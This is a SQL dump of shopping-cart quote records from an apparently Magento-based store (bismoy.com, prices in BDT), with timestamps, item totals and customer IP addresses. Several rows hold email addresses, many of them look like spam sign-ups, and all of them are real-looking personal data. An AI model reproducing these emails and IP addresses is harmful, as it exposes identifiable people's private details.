(109, 1, '2023-07-04 19:34:09', '2023-07-04 19:34:09', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '209.127.186.227', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(110, 1, '2023-07-11 16:32:05', '2023-07-11 16:32:08', NULL, 1, 0, 0, 1, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 108.0000, 108.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '209.127.186.227', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 108.0000, 108.0000, 108.0000, 108.0000, 1, 0, NULL, NULL, 0),
(111, 1, '2023-07-17 15:19:38', '2023-07-17 15:19:40', NULL, 1, 0, 0, 1, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 108.0000, 108.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '209.127.186.227', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 108.0000, 108.0000, 108.0000, 108.0000, 1, 0, NULL, NULL, 0),
(112, 1, '2023-08-02 01:16:27', '2023-08-02 01:16:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 69, NULL, 1, 'ale.x.a.ndra.go.no.s.t.ae.va@gmail.com', NULL, 'bismoy.com.svhdvhgdh', NULL, 'google.com', NULL, NULL, NULL, 1, 0, '165.231.67.221', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(113, 1, '2023-08-02 19:40:35', '2023-08-02 19:40:35', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 70, NULL, 1, 'ale.x.a.ndrag.on.o.st.aeva@gmail.com', NULL, 'bismoy.com.esrcuopkzsx', NULL, 'google.com/', NULL, NULL, NULL, 1, 0, '178.132.109.233', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(114, 1, '2023-08-03 17:48:36', '2023-08-03 17:48:36', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 71, NULL, 1, 'ale.x.an.d.rag.ono.s.t.aeva@gmail.com', NULL, 'bismoy.com.esrcuopkzsx', NULL, 'google.com', NULL, NULL, NULL, 1, 0, '178.132.108.160', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(115, 1, '2023-08-04 18:33:12', '2023-08-04 18:33:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 72, NULL, 1, 'al.exan.dra.g.o.n.os.t.a.e.v.a@gmail.com', NULL, 'bismoy.com.srtcgdfolj', NULL, 'google.com', NULL, NULL, NULL, 1, 0, '178.132.108.98', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(116, 1, '2023-08-05 00:46:20', '2023-08-05 00:46:20', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '89.117.9.82', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(117, 1, '2023-08-05 00:47:29', '2023-08-05 00:47:29', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '89.117.9.82', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(118, 1, '2023-08-05 11:37:13', '2023-08-05 11:37:13', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 73, NULL, 1, 'al.e.x.a.nd.r.a.gon.o.s.taeva@gmail.com', NULL, 'bismoy.com.srtcgdfolj', NULL, 'google.com/', NULL, NULL, NULL, 1, 0, '178.132.108.111', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(119, 1, '2023-08-12 01:27:47', '2023-08-12 01:27:47', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 74, NULL, 1, 'al.e.x.a.nd.r.a.g.on.o.st.a.eva@gmail.com', NULL, 'bismoy.com.g4U', NULL, 'google.com', NULL, NULL, NULL, 1, 0, '178.132.108.26', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(121, 1, '2023-08-12 08:41:30', '2023-08-12 08:41:30', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '91.220.163.57', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(307, 1, '2023-08-13 11:42:06', '2023-08-13 11:42:08', NULL, 1, 0, 0, 1, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 108.0000, 108.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '209.127.186.227', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 108.0000, 108.0000, 108.0000, 108.0000, 1, 0, NULL, NULL, 0),
(308, 1, '2023-08-13 12:28:37', '2023-08-13 12:28:38', NULL, 1, 0, 0, 1, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 108.0000, 108.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '209.127.186.227', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 108.0000, 108.0000, 108.0000, 108.0000, 1, 0, NULL, NULL, 0),
(309, 1, '2023-08-14 13:10:54', '2023-08-14 13:10:54', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '83.172.60.123', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(310, 1, '2023-08-16 10:05:14', '2023-08-16 10:05:14', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '89.117.9.82', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(311, 1, '2023-08-16 18:20:35', '2023-08-16 18:20:35', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '89.117.9.82', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(312, 1, '2023-08-17 11:54:34', '2023-08-17 11:54:36', NULL, 1, 0, 0, 1, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 108.0000, 108.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '209.127.186.227', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 108.0000, 108.0000, 108.0000, 108.0000, 1, 0, NULL, NULL, 0),
(313, 1, '2023-08-17 12:00:39', '2023-08-17 12:00:40', NULL, 1, 0, 0, 1, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 108.0000, 108.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '209.127.186.227', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 108.0000, 108.0000, 108.0000, 108.0000, 1, 0, NULL, NULL, 0),
(314, 1, '2023-08-18 02:18:35', '2023-08-18 02:18:35', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '209.127.186.227', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(315, 1, '2023-08-18 02:18:37', '2023-08-18 02:18:37', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '209.127.186.227', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(316, 1, '2023-08-20 05:41:05', '2023-08-20 05:41:08', NULL, 1, 0, 0, 1, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 108.0000, 108.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '209.127.186.227', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 108.0000, 108.0000, 108.0000, 108.0000, 1, 0, NULL, NULL, 0),
(317, 1, '2023-09-02 04:00:18', '2023-09-02 04:00:18', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 76, NULL, 1, 'al.e.x.a.n.d.ra.gonost.a.e.v.a@gmail.com', NULL, 'bismoy.com.g4U', NULL, 'google.com', NULL, NULL, NULL, 1, 0, '95.65.127.123', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(318, 1, '2023-09-03 04:21:44', '2023-09-03 04:21:47', NULL, 1, 0, 0, 1, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 108.0000, 108.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '209.127.186.227', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 108.0000, 108.0000, 108.0000, 108.0000, 1, 0, NULL, NULL, 0),
(319, 1, '2023-09-03 14:58:59', '2023-09-03 14:59:00', NULL, 1, 0, 0, 1, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 108.0000, 108.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '209.127.186.227', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 108.0000, 108.0000, 108.0000, 108.0000, 1, 0, NULL, NULL, 0),
(320, 1, '2023-09-04 11:08:12', '2023-09-04 11:08:15', NULL, 1, 0, 0, 1, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 108.0000, 108.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '20.70.30.210', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 108.0000, 108.0000, 108.0000, 108.0000, 1, 0, NULL, NULL, 0);
INSERT INTO `quote` (`entity_id`, `store_id`, `created_at`, `updated_at`, `converted_at`, `is_active`, `is_virtual`, `is_multi_shipping`, `items_count`, `items_qty`, `orig_order_id`, `store_to_base_rate`, `store_to_quote_rate`, `base_currency_code`, `store_currency_code`, `quote_currency_code`, `grand_total`, `base_grand_total`, `checkout_method`, `customer_id`, `customer_tax_class_id`, `customer_group_id`, `customer_email`, `customer_prefix`, `customer_firstname`, `customer_middlename`, `customer_lastname`, `customer_suffix`, `customer_dob`, `customer_note`, `customer_note_notify`, `customer_is_guest`, `remote_ip`, `applied_rule_ids`, `reserved_order_id`, `password_hash`, `coupon_code`, `global_currency_code`, `base_to_global_rate`, `base_to_quote_rate`, `customer_taxvat`, `customer_gender`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `is_changed`, `trigger_recollect`, `ext_shipping_info`, `gift_message_id`, `is_persistent`) VALUES
(321, 1, '2023-09-05 13:01:48', '2023-09-05 13:01:48', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 77, NULL, 1, 'a.le.x.an.d.r.a.go.n.ost.a.eva@gmail.com', NULL, 'bismoy.com.g4Dr', NULL, 'google.com', NULL, NULL, NULL, 1, 0, '95.65.127.123', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(322, 1, '2023-09-11 00:20:19', '2023-09-11 00:20:19', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 78, NULL, 1, 'a.lex.an.d.ra.go.n.osta.e.v.a@gmail.com', NULL, 'bismoy.com.r8fr', NULL, 'google.com', NULL, NULL, NULL, 1, 0, '95.65.127.123', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(323, 1, '2023-09-13 03:01:27', '2023-09-13 03:01:38', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 59.0000, 59.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '79.124.56.206', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(324, 1, '2023-09-18 14:43:02', '2023-09-18 14:43:11', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 59.0000, 59.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '79.124.56.206', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(325, 1, '2023-10-04 10:07:54', '2023-10-04 10:07:54', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '89.117.9.82', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(326, 1, '2023-10-05 06:18:06', '2023-10-05 06:18:08', NULL, 1, 0, 0, 1, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 108.0000, 108.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '23.229.31.25', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 108.0000, 108.0000, 108.0000, 108.0000, 1, 0, NULL, NULL, 0),
(327, 1, '2023-10-05 06:52:15', '2023-10-05 06:52:16', NULL, 1, 0, 0, 1, 2.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 108.0000, 108.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '23.229.31.25', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 108.0000, 108.0000, 108.0000, 108.0000, 1, 0, NULL, NULL, 0),
(328, 1, '2023-10-08 04:50:31', '2023-10-08 04:50:31', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '89.117.9.82', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(329, 1, '2023-10-09 16:45:53', '2023-10-09 16:45:53', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '89.117.9.82', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(330, 1, '2023-10-19 04:22:11', '2023-10-19 04:28:52', NULL, 1, 0, 0, 7, 189.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 47474.4000, 47474.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '185.225.28.230', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 59343.0000, 59343.0000, 47474.4000, 47474.4000, 1, 0, NULL, NULL, 0),
(331, 1, '2023-11-07 08:36:28', '2023-11-07 08:36:28', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '155.248.232.146', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(332, 1, '2023-11-07 08:36:30', '2023-11-07 08:36:30', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '155.248.232.146', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(333, 1, '2023-11-07 08:36:30', '2023-11-07 08:36:30', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '155.248.232.146', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(334, 1, '2023-11-07 08:36:31', '2023-11-07 08:36:31', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '155.248.232.146', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(335, 1, '2023-11-07 08:36:31', '2023-11-07 08:36:31', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '155.248.232.146', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(336, 1, '2023-11-09 13:25:23', '2023-11-09 13:25:23', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 336.8000, 336.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '195.35.35.23', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 421.0000, 421.0000, 336.8000, 336.8000, 1, 0, NULL, NULL, 0),
(337, 1, '2023-11-09 17:46:52', '2023-11-09 17:46:52', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '195.35.35.23', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(338, 1, '2023-11-10 10:35:23', '2023-11-10 10:35:23', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 79, NULL, 1, 'WfhzPO.cjppwj@rottack.autos', NULL, 'eYhBRrtlVz', NULL, 'eYhBRrtlVz', NULL, NULL, NULL, 1, 0, '78.47.215.39', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(339, 1, '2023-11-10 16:07:07', '2023-11-10 16:07:07', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '195.35.35.23', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(340, 1, '2023-11-12 10:33:05', '2023-11-12 10:33:05', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 336.8000, 336.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '195.35.35.23', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 421.0000, 421.0000, 336.8000, 336.8000, 1, 0, NULL, NULL, 0),
(341, 1, '2023-11-14 00:50:34', '2023-11-14 00:50:34', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '194.34.132.56', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(342, 1, '2023-11-14 01:36:21', '2023-11-14 01:36:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '194.34.132.56', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(343, 1, '2023-11-14 01:36:21', '2023-11-14 01:36:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '194.34.132.56', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(344, 1, '2023-11-14 01:36:22', '2023-11-14 01:36:22', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '194.34.132.56', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(345, 1, '2023-11-14 01:36:22', '2023-11-14 01:36:22', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '194.34.132.56', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(346, 1, '2023-11-16 12:30:29', '2023-11-16 12:30:29', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '45.9.148.63', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(347, 1, '2023-11-16 12:31:00', '2023-11-16 12:31:04', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '45.9.148.63', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(348, 1, '2023-11-16 12:31:24', '2023-11-16 12:31:28', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '45.9.148.63', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(349, 1, '2023-11-16 12:31:45', '2023-11-16 12:31:49', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '45.9.148.63', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(350, 1, '2023-11-16 12:32:08', '2023-11-16 12:32:12', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '45.9.148.63', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(351, 1, '2023-11-16 12:32:27', '2023-11-16 12:32:33', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '45.9.148.63', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
